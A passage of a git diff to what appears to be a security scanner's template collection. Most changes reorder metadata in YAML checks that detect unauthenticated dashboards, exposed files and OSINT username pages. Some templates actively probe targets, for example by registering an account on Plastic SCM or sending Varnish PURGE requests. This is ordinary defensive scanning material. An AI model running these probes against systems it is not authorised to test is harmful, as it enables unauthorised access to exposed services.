cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: apache,tomcat,misconfig metadata: max-request: 8 + tags: apache,tomcat,misconfig http: - method: GET diff --git a/http/misconfiguration/transmission-dashboard.yaml b/http/misconfiguration/transmission-dashboard.yaml index e53af14374..a0c7c17336 100644 --- a/http/misconfiguration/transmission-dashboard.yaml +++ b/http/misconfiguration/transmission-dashboard.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Transmission Web Interface" tags: misconfig,transmission,exposure,dashboard @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: word diff --git a/http/misconfiguration/typo3-composer.yaml b/http/misconfiguration/typo3-composer.yaml index 7f64d8c230..1d22426023 100644 --- a/http/misconfiguration/typo3-composer.yaml +++ b/http/misconfiguration/typo3-composer.yaml @@ -5,12 +5,12 @@ info: author: 0x_Akoko severity: low description: | - The web application is based on Typo3 CMS. A sensitive file has been found. Access to such files must be restricted, as it may lead to disclosure of sensitive information about the web application. + The web application is based on Typo3 CMS. A sensitive file has been found. Access to such files must be restricted, as it may lead to disclosure of sensitive information about the web application. reference: - https://docs.typo3.org/c/typo3/cms-core/main/en-us/Changelog/9.0/Breaking-83302-ComposerRestrictsInstallationOfTypo3cms.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "X-TYPO3-Parsetime: 0ms" tags: typo3,cms,exposure,misconfig diff --git a/http/misconfiguration/typo3-debug-mode.yaml b/http/misconfiguration/typo3-debug-mode.yaml index dd785ab9a8..d1c0564e91 100644 --- a/http/misconfiguration/typo3-debug-mode.yaml +++ b/http/misconfiguration/typo3-debug-mode.yaml @@ -5,8 +5,8 @@ info: author: tess severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"TYPO3 Exception" tags: typo3,debug,misconfig diff --git a/http/misconfiguration/unauth-apache-kafka-ui.yaml b/http/misconfiguration/unauth-apache-kafka-ui.yaml index 6e129dca05..9dd7befb14 100644 --- a/http/misconfiguration/unauth-apache-kafka-ui.yaml +++ b/http/misconfiguration/unauth-apache-kafka-ui.yaml @@ -9,8 +9,8 @@ info: - https://www.acunetix.com/vulnerabilities/web/apache-kafka-unauthorized-access-vulnerability - https://github.com/provectus/kafka-ui metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"UI for Apache Kafka" tags: misconfig,apache,kafka,unauth,exposure @@ -21,6 +21,7 @@ http: - '{{BaseURL}}/ui/clusters/kafka-ui/brokers' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/unauth-axyom-network-manager.yaml b/http/misconfiguration/unauth-axyom-network-manager.yaml index 38e5de4aea..4b7f9625d7 100644 --- a/http/misconfiguration/unauth-axyom-network-manager.yaml +++ b/http/misconfiguration/unauth-axyom-network-manager.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Axyom Network Manager" tags: misconfig,axyom,exposure,unauth diff --git a/http/misconfiguration/unauth-etherpad.yaml b/http/misconfiguration/unauth-etherpad.yaml index 475e7dde89..2d1c712e9a 100644 --- a/http/misconfiguration/unauth-etherpad.yaml +++ b/http/misconfiguration/unauth-etherpad.yaml @@ -7,8 +7,8 @@ info: description: | Finds Etherpad instances that allow adding new notes without authentication. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"index.createOpenPad" tags: etherpad,misconfig,unauth diff --git a/http/misconfiguration/unauth-fastvue-dashboard.yaml b/http/misconfiguration/unauth-fastvue-dashboard.yaml index bda4d19889..8a01fa6f69 100644 --- a/http/misconfiguration/unauth-fastvue-dashboard.yaml +++ b/http/misconfiguration/unauth-fastvue-dashboard.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1117549627 tags: panel,fastvue,unauth,misconfig diff --git a/http/misconfiguration/unauth-kubecost.yaml b/http/misconfiguration/unauth-kubecost.yaml index 79b2cbb8b3..3c20a836ae 100644 --- a/http/misconfiguration/unauth-kubecost.yaml +++ b/http/misconfiguration/unauth-kubecost.yaml @@ -1,12 +1,13 @@ id: unauth-kubecost + info: name: KubeCost - Unauthenticated Dashboard Exposure author: pussycat0x severity: medium reference: https://www.facebook.com/photo?fbid=470414125129112&set=pcb.470413798462478 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:kubecost tags: misconfig,exposure,unauth,kubecost diff --git a/http/misconfiguration/unauth-ldap-account-manager.yaml b/http/misconfiguration/unauth-ldap-account-manager.yaml index e36ee97a5b..55c5e6ab8d 100644 --- a/http/misconfiguration/unauth-ldap-account-manager.yaml +++ b/http/misconfiguration/unauth-ldap-account-manager.yaml @@ -5,8 +5,8 @@ info: author: tess severity: medium metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"LDAP Account Manager" tags: ldap,misconfig,unauth diff --git a/http/misconfiguration/unauth-mautic-upgrade.yaml b/http/misconfiguration/unauth-mautic-upgrade.yaml index 0b281915e0..19d94ed8e1 100644 --- a/http/misconfiguration/unauth-mautic-upgrade.yaml +++ b/http/misconfiguration/unauth-mautic-upgrade.yaml @@ -5,8 +5,8 @@ info: author: huowuzhao severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Mautic" tags: misconfig,unauth,mautic diff --git a/http/misconfiguration/unauth-mercurial.yaml b/http/misconfiguration/unauth-mercurial.yaml index e921915963..5b4a4bf485 100644 --- a/http/misconfiguration/unauth-mercurial.yaml +++ b/http/misconfiguration/unauth-mercurial.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Mercurial repositories index" tags: misconfig,unauth,mercurial diff --git a/http/misconfiguration/unauth-redis-insight.yaml b/http/misconfiguration/unauth-redis-insight.yaml index 12b62f3219..de025be617 100644 --- a/http/misconfiguration/unauth-redis-insight.yaml +++ b/http/misconfiguration/unauth-redis-insight.yaml @@ -10,8 +10,8 @@ info: - https://redis.com/redis-enterprise/redis-insight/ metadata: verified: 'true' - shodan-query: title:"RedisInsight" max-request: 1 + shodan-query: title:"RedisInsight" tags: redis,redisinsight,unauth,misconfig http: diff --git a/http/misconfiguration/unauth-selenium-grid-console.yaml b/http/misconfiguration/unauth-selenium-grid-console.yaml index ffb69a2fd5..c0e3425698 100644 --- a/http/misconfiguration/unauth-selenium-grid-console.yaml +++ b/http/misconfiguration/unauth-selenium-grid-console.yaml @@ -7,11 +7,11 @@ info: description: Selenium Grid Console panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 tags: misconfig,unauth,selenium http: @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/console" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/unauth-temporal-web-ui.yaml b/http/misconfiguration/unauth-temporal-web-ui.yaml index e64d5e8fab..c0e9ae8629 100644 --- a/http/misconfiguration/unauth-temporal-web-ui.yaml +++ b/http/misconfiguration/unauth-temporal-web-ui.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: "true" max-request: 2 shodan-query: http.favicon.hash:557327884 - verified: "true" tags: temporal,unauth http: @@ -28,8 +28,9 @@ http: - type: dsl dsl: - "status_code_1 == 200 && (\"44c856843ce2631b1d6968ac11fa9ec4\" == md5(body_1))" + - type: dsl dsl: - "contains(body_2, 'nextPageToken') && status_code_2 == 200" - "contains(body_2, 'Namespace default is not found.') && status_code_2 == 404" - condition: or \ No newline at end of file + condition: or diff --git a/http/misconfiguration/unauth-wavink-panel.yaml b/http/misconfiguration/unauth-wavink-panel.yaml index 5a4c8ab57c..ecb63bfae1 100644 --- a/http/misconfiguration/unauth-wavink-panel.yaml +++ b/http/misconfiguration/unauth-wavink-panel.yaml @@ -6,8 +6,8 @@ info: severity: high description: Wavlink Panel was able to be accessed with no authentication requirements in place. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" tags: exposure,wavlink,unauth,misconfig,router diff --git a/http/misconfiguration/unauth-zwave-mqtt.yaml b/http/misconfiguration/unauth-zwave-mqtt.yaml index 1d51cfb7e1..99533aed52 100644 --- a/http/misconfiguration/unauth-zwave-mqtt.yaml +++ b/http/misconfiguration/unauth-zwave-mqtt.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/OpenZWave/Zwave2Mqtt metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ZWave To MQTT" tags: misconfig,zwave,mqtt,unauth diff --git a/http/misconfiguration/unauthenticated-glances.yaml b/http/misconfiguration/unauthenticated-glances.yaml index 0cf9cc859e..8c56973b1d 100644 --- a/http/misconfiguration/unauthenticated-glances.yaml +++ b/http/misconfiguration/unauthenticated-glances.yaml @@ -7,9 +7,9 @@ info: description: Glance running web server mode & Unauthenticated leads system monitoring to info disclosure reference: - https://glances.readthedocs.io/en/latest/quickstart.html#how-to-protect-your-server-or-web-server-with-a-login-password - tags: exposure,glances,misconfig metadata: max-request: 1 + tags: exposure,glances,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthenticated-lansweeper.yaml b/http/misconfiguration/unauthenticated-lansweeper.yaml index 89756ffe85..5f7942c37d 100644 --- a/http/misconfiguration/unauthenticated-lansweeper.yaml +++ b/http/misconfiguration/unauthenticated-lansweeper.yaml @@ -4,9 +4,9 @@ info: name: Unauthenticated Lansweeper Instance author: divya_mudgal severity: high - tags: lansweeper,unauth,misconfig metadata: max-request: 1 + tags: lansweeper,unauth,misconfig http: - method: GET @@ -16,4 +16,4 @@ http: matchers: - type: word words: - - "Main page - Lansweeper" \ No newline at end of file + - "Main page - Lansweeper" diff --git a/http/misconfiguration/unauthenticated-mongo-express.yaml b/http/misconfiguration/unauthenticated-mongo-express.yaml index 79cb6e6d0d..bffd130495 100644 --- a/http/misconfiguration/unauthenticated-mongo-express.yaml +++ b/http/misconfiguration/unauthenticated-mongo-express.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.exploit-db.com/ghdb/5684 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: title:"Home - Mongo Express" tags: mongo,unauth,edb,misconfig @@ -27,6 +27,7 @@ http: - 'Home - Mongo Express' - 'system.users - Mongo Express' condition: or + - type: status status: - 200 diff --git a/http/misconfiguration/unauthenticated-netdata.yaml b/http/misconfiguration/unauthenticated-netdata.yaml index db80ac6f58..e39fe526e8 100644 --- a/http/misconfiguration/unauthenticated-netdata.yaml +++ b/http/misconfiguration/unauthenticated-netdata.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://github.com/netdata/netdata - tags: netdata,unauth,misconfig metadata: max-request: 1 + tags: netdata,unauth,misconfig http: - method: GET @@ -30,4 +30,4 @@ http: - type: word words: - "application/json" - part: header \ No newline at end of file + part: header diff --git a/http/misconfiguration/unauthenticated-nginx-dashboard.yaml b/http/misconfiguration/unauthenticated-nginx-dashboard.yaml index aad1963134..935eec260e 100644 --- a/http/misconfiguration/unauthenticated-nginx-dashboard.yaml +++ b/http/misconfiguration/unauthenticated-nginx-dashboard.yaml @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/dashboard.html" max-size: 2048 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/unauthenticated-popup-upload.yaml b/http/misconfiguration/unauthenticated-popup-upload.yaml index 27c1fc9ffd..a4aadb8650 100644 --- a/http/misconfiguration/unauthenticated-popup-upload.yaml +++ b/http/misconfiguration/unauthenticated-popup-upload.yaml @@ -3,17 +3,17 @@ id: unauthenticated-popup-upload info: name: Unauthenticated Popup File Upload - Detect author: DhiyaneshDk - description: Endpoints where files can be uploaded without authentication were detected. severity: info + description: Endpoints where files can be uploaded without authentication were detected. reference: - https://www.exploit-db.com/ghdb/6671 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,fileupload,misconfig metadata: max-request: 1 + tags: edb,fileupload,misconfig,intrusive http: - method: GET diff --git a/http/misconfiguration/unauthenticated-prtg.yaml b/http/misconfiguration/unauthenticated-prtg.yaml index c50feb984a..9f885d9230 100644 --- a/http/misconfiguration/unauthenticated-prtg.yaml +++ b/http/misconfiguration/unauthenticated-prtg.yaml @@ -7,9 +7,9 @@ info: description: PRTG Traffic Grapher was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5808 - tags: config,unauth,prtg,edb,misconfig metadata: max-request: 1 + tags: config,unauth,prtg,edb,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthenticated-tensorboard.yaml b/http/misconfiguration/unauthenticated-tensorboard.yaml index acda05cd8c..da72b62cb8 100644 --- a/http/misconfiguration/unauthenticated-tensorboard.yaml +++ b/http/misconfiguration/unauthenticated-tensorboard.yaml @@ -3,11 +3,11 @@ id: unauthenticated-tensorboard info: name: Tensorflow Tensorboard - Unauthenticated Access author: dhiyaneshDk - description: Tensorflow Tensorboard was able to be accessed with no authentication requirements in place. severity: high - tags: tensorflow,tensorboard,unauth,misconfig + description: Tensorflow Tensorboard was able to be accessed with no authentication requirements in place. metadata: max-request: 1 + tags: tensorflow,tensorboard,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthenticated-varnish-cache-purge.yaml b/http/misconfiguration/unauthenticated-varnish-cache-purge.yaml index 5e2a802115..34a1096b18 100644 --- a/http/misconfiguration/unauthenticated-varnish-cache-purge.yaml +++ b/http/misconfiguration/unauthenticated-varnish-cache-purge.yaml @@ -8,9 +8,9 @@ info: reference: - https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html - https://hackerone.com/reports/154278 - tags: misconfig,cache,hackerone,varnish metadata: max-request: 1 + tags: misconfig,cache,hackerone,varnish http: - method: PURGE diff --git a/http/misconfiguration/unauthenticated-zipkin.yaml b/http/misconfiguration/unauthenticated-zipkin.yaml index 711dc2a663..2876fa8ca9 100644 --- a/http/misconfiguration/unauthenticated-zipkin.yaml +++ b/http/misconfiguration/unauthenticated-zipkin.yaml @@ -7,9 +7,9 @@ info: description: Unauthenticated access to Zipkin was discovered. reference: - https://zipkin.io/ - tags: unauth,misconfig metadata: max-request: 1 + tags: unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/unauthorized-h3csecparh-login.yaml b/http/misconfiguration/unauthorized-h3csecparh-login.yaml index 85120847b5..66be5c25ff 100644 --- a/http/misconfiguration/unauthorized-h3csecparh-login.yaml +++ b/http/misconfiguration/unauthorized-h3csecparh-login.yaml @@ -6,8 +6,8 @@ info: severity: high description: H3C server was able to be accessed with no authentication requirements in place. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"H3C-SecPath-运维审计系统" fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" tags: h3c,default-login,unauth,misconfig diff --git a/http/misconfiguration/unauthorized-plastic-scm.yaml b/http/misconfiguration/unauthorized-plastic-scm.yaml index d3689ab596..de37718cbc 100644 --- a/http/misconfiguration/unauthorized-plastic-scm.yaml +++ b/http/misconfiguration/unauthorized-plastic-scm.yaml @@ -9,18 +9,17 @@ info: - https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 classification: cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-288 - tags: plastic,misconfig metadata: max-request: 3 + tags: plastic,misconfig,intrusive http: - raw: - | GET /account/register HTTP/1.1 {{Hostname}} - - | POST /account/register HTTP/1.1 Host: {{Hostname}} @@ -30,12 +29,12 @@ http: Connection: close Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false - - | GET /configuration HTTP/1.1 {{Hostname}} cookie-reuse: true + extractors: - type: regex part: body diff --git a/http/misconfiguration/ups-status.yaml b/http/misconfiguration/ups-status.yaml index ded1836c6a..5185dd7779 100644 --- a/http/misconfiguration/ups-status.yaml +++ b/http/misconfiguration/ups-status.yaml @@ -10,11 +10,11 @@ info: - https://www.exploit-db.com/ghdb/752 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: logs,status,edb,misconfig metadata: max-request: 2 + tags: logs,status,edb,misconfig http: - method: GET diff --git a/http/misconfiguration/v2x-control.yaml b/http/misconfiguration/v2x-control.yaml index f9413935f7..693599c28e 100644 --- a/http/misconfiguration/v2x-control.yaml +++ b/http/misconfiguration/v2x-control.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=606940284809828&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"V2X Control" tags: misconfig,exposure,v2x,control @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/vercel-source-exposure.yaml b/http/misconfiguration/vercel-source-exposure.yaml index 5fca611120..571b3db9ed 100644 --- a/http/misconfiguration/vercel-source-exposure.yaml +++ b/http/misconfiguration/vercel-source-exposure.yaml @@ -4,13 +4,12 @@ info: name: Vercel Source Code Exposure author: hlop severity: medium - reference: - - https://vercel.com/docs/projects/overview#logs-and-source-protection description: | The Vercel Source Code Exposure misconfiguration allows an attacker to access sensitive source code files on the Vercel platform. - impact: | - This misconfiguration can lead to the exposure of sensitive information, such as API keys, credentials, and proprietary code, which can be used for further attacks or unauthorized access. + reference: + - https://vercel.com/docs/projects/overview#logs-and-source-protection metadata: + max-request: 1 fofa-query: cname_domain="vercel.app" || icon_hash="-2070047203" tags: vercel,exposure,misconfig @@ -21,6 +20,7 @@ http: redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/vernemq-status-page.yaml b/http/misconfiguration/vernemq-status-page.yaml index ba61aa6f52..ca85e23c84 100644 --- a/http/misconfiguration/vernemq-status-page.yaml +++ b/http/misconfiguration/vernemq-status-page.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://github.com/vernemq/vernemq - tags: misconfig,vernemq,status metadata: max-request: 1 + tags: misconfig,vernemq,status http: - method: GET diff --git a/http/misconfiguration/wamp-server-configuration.yaml b/http/misconfiguration/wamp-server-configuration.yaml index 151267a9ab..ae5fe3d36e 100644 --- a/http/misconfiguration/wamp-server-configuration.yaml +++ b/http/misconfiguration/wamp-server-configuration.yaml @@ -6,9 +6,9 @@ info: severity: medium description: Wamp default page will expose sensitive configuration and vhosts. reference: https://www.exploit-db.com/ghdb/6891. - tags: wamp,exposure,misconfig metadata: max-request: 1 + tags: wamp,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/wamp-xdebug-detect.yaml b/http/misconfiguration/wamp-xdebug-detect.yaml index 5634612c79..e2bfdd2c40 100644 --- a/http/misconfiguration/wamp-xdebug-detect.yaml +++ b/http/misconfiguration/wamp-xdebug-detect.yaml @@ -9,11 +9,11 @@ info: - https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: debug,config,wamp,misconfig metadata: max-request: 1 + tags: debug,config,wamp,misconfig http: - method: GET diff --git a/http/misconfiguration/webalizer-statistics.yaml b/http/misconfiguration/webalizer-statistics.yaml index 6d94f35ff3..bd09e8686b 100644 --- a/http/misconfiguration/webalizer-statistics.yaml +++ b/http/misconfiguration/webalizer-statistics.yaml @@ -11,8 +11,8 @@ info: - https://www.rapid7.com/db/vulnerabilities/spider-webalizer-stats-disclosure - https://www.tenable.com/plugins/nnm/2506 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"Generated by The Webalizer" tags: webalizer,logs,statistics,tenable,misconfig @@ -23,6 +23,7 @@ http: - '{{BaseURL}}/stats/index.html' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/webdav-enabled.yaml b/http/misconfiguration/webdav-enabled.yaml index 8a69c6ba4c..3478860b11 100644 --- a/http/misconfiguration/webdav-enabled.yaml +++ b/http/misconfiguration/webdav-enabled.yaml @@ -12,11 +12,11 @@ info: - https://www.acunetix.com/vulnerabilities/web/webdav-enabled/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: "Ms-Author-Via: DAV" tags: webdav,misconfig,exposure @@ -25,11 +25,9 @@ http: - | GET / HTTP/1.1 Host: {{Hostname}} - - | OPTIONS / HTTP/1.1 Host: {{Hostname}} - - | OPTIONS / HTTP/1.1 Host: {{Hostname}} diff --git a/http/misconfiguration/wildcard-postmessage.yaml b/http/misconfiguration/wildcard-postmessage.yaml index 82f0b819a5..da7afeb776 100644 --- a/http/misconfiguration/wildcard-postmessage.yaml +++ b/http/misconfiguration/wildcard-postmessage.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,postmessage,misconfig metadata: max-request: 1 + tags: xss,postmessage,misconfig http: - method: GET diff --git a/http/misconfiguration/wp-registration-enabled.yaml b/http/misconfiguration/wp-registration-enabled.yaml index 419360df1e..911b86a28b 100644 --- a/http/misconfiguration/wp-registration-enabled.yaml +++ b/http/misconfiguration/wp-registration-enabled.yaml @@ -12,11 +12,11 @@ info: - https://www.acunetix.com/vulnerabilities/web/wordpress-user-registration-enabled/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: wordpress,wp,misconfig http: @@ -25,7 +25,6 @@ http: - "{{BaseURL}}/wp-login.php" matchers-condition: and - matchers: - type: word part: body diff --git a/http/misconfiguration/xss-deprecated-header.yaml b/http/misconfiguration/xss-deprecated-header.yaml index d1aa1f48d2..7ba688dd7a 100644 --- a/http/misconfiguration/xss-deprecated-header.yaml +++ b/http/misconfiguration/xss-deprecated-header.yaml @@ -10,10 +10,10 @@ info: - https://owasp.org/www-project-secure-headers/#x-xss-protection classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - tags: xss,misconfig,generic + cvss-score: 0 metadata: max-request: 1 + tags: xss,misconfig,generic http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex part: header regex: diff --git a/http/misconfiguration/zabbix-dashboards-access.yaml b/http/misconfiguration/zabbix-dashboards-access.yaml index 7842e95a62..91f27cc328 100644 --- a/http/misconfiguration/zabbix-dashboards-access.yaml +++ b/http/misconfiguration/zabbix-dashboards-access.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: edb,packetstorm,zabbix,unauth,misconfig metadata: max-request: 1 + tags: edb,packetstorm,zabbix,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/zabbix-error.yaml b/http/misconfiguration/zabbix-error.yaml index 92297e5b6c..60fe058caa 100644 --- a/http/misconfiguration/zabbix-error.yaml +++ b/http/misconfiguration/zabbix-error.yaml @@ -7,7 +7,7 @@ info: description: Zabbix panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/misconfiguration/zenphoto-sensitive-info.yaml b/http/misconfiguration/zenphoto-sensitive-info.yaml index e71e09c154..a7cff11b3f 100644 --- a/http/misconfiguration/zenphoto-sensitive-info.yaml +++ b/http/misconfiguration/zenphoto-sensitive-info.yaml @@ -5,9 +5,9 @@ info: author: qlkwej severity: medium description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure - tags: unauth metadata: max-request: 4 + tags: unauth http: - method: GET @@ -18,6 +18,7 @@ http: - '{{BaseURL}}/zp-core/setup/index.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml index 6e7c96ef8e..51fa896613 100644 --- a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml +++ b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://buaq.net/go-53721.html - tags: seeyon,unauth,zhiyuan,misconfig metadata: max-request: 1 + tags: seeyon,unauth,zhiyuan,misconfig http: - method: GET @@ -17,7 +17,6 @@ http: matchers-condition: and matchers: - - type: word words: - "serverIdentifier" diff --git a/http/osint/1001mem.yaml b/http/osint/1001mem.yaml index 1777334eab..e61750d4d0 100644 --- a/http/osint/1001mem.yaml +++ b/http/osint/1001mem.yaml @@ -3,17 +3,18 @@ id: 1001mem info: name: 1001mem User Name Information - Detect author: dwisiswant0 - description: 1001mem user name information check was conducted. severity: info + description: 1001mem user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,1001mem metadata: max-request: 1 + tags: osint,osint-social,1001mem self-contained: true + http: - method: GET path: diff --git a/http/osint/21buttons.yaml b/http/osint/21buttons.yaml index 3ea546c2a5..3dc725d339 100644 --- a/http/osint/21buttons.yaml +++ b/http/osint/21buttons.yaml @@ -3,17 +3,18 @@ id: 21buttons info: name: 21buttons User Name Information - Detect author: dwisiswant0 - description: 21buttons user name information check was conducted. severity: info + description: 21buttons user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,21buttons metadata: max-request: 1 + tags: osint,osint-social,21buttons self-contained: true + http: - method: GET path: diff --git a/http/osint/247sports.yaml b/http/osint/247sports.yaml index f3b7518a92..81afa2ecf9 100644 --- a/http/osint/247sports.yaml +++ b/http/osint/247sports.yaml @@ -3,17 +3,18 @@ id: 247sports info: name: 247sports User Name Information - Detect author: dwisiswant0 - description: 247sports user name information check was conducted. severity: info + description: 247sports user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,247sports metadata: max-request: 1 + tags: osint,osint-hobby,247sports self-contained: true + http: - method: GET path: diff --git a/http/osint/3dnews.yaml b/http/osint/3dnews.yaml index d6ebf07e3c..37b10e9a2d 100644 --- a/http/osint/3dnews.yaml +++ b/http/osint/3dnews.yaml @@ -3,17 +3,18 @@ id: 3dnews info: name: 3DNews User Name Information - Detect author: dwisiswant0 - description: 3DNews user name information check was conducted. severity: info + description: 3DNews user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,3dnews metadata: max-request: 1 + tags: osint,osint-social,3dnews self-contained: true + http: - method: GET path: diff --git a/http/osint/3dtoday.yaml b/http/osint/3dtoday.yaml index e3cfcda158..19d991db68 100644 --- a/http/osint/3dtoday.yaml +++ b/http/osint/3dtoday.yaml @@ -3,17 +3,18 @@ id: 3dtoday info: name: 3dtoday User Name Information - Detect author: dwisiswant0 - description: 3dtoday user name information check was conducted. severity: info + description: 3dtoday user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,3dtoday metadata: max-request: 1 + tags: osint,osint-hobby,3dtoday self-contained: true + http: - method: GET path: diff --git a/http/osint/7cup.yaml b/http/osint/7cup.yaml index 964ee6ee93..7a1580c37a 100644 --- a/http/osint/7cup.yaml +++ b/http/osint/7cup.yaml @@ -3,17 +3,18 @@ id: 7cup info: name: 7cup User Name Information - Detect author: dwisiswant0 - description: 7cup user name information check was conducted. severity: info + description: 7cup user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,7cup metadata: max-request: 1 + tags: osint,osint-social,7cup self-contained: true + http: - method: GET path: diff --git a/http/osint/7dach.yaml b/http/osint/7dach.yaml index 8a7c6cd2d3..3b3c998764 100644 --- a/http/osint/7dach.yaml +++ b/http/osint/7dach.yaml @@ -3,17 +3,18 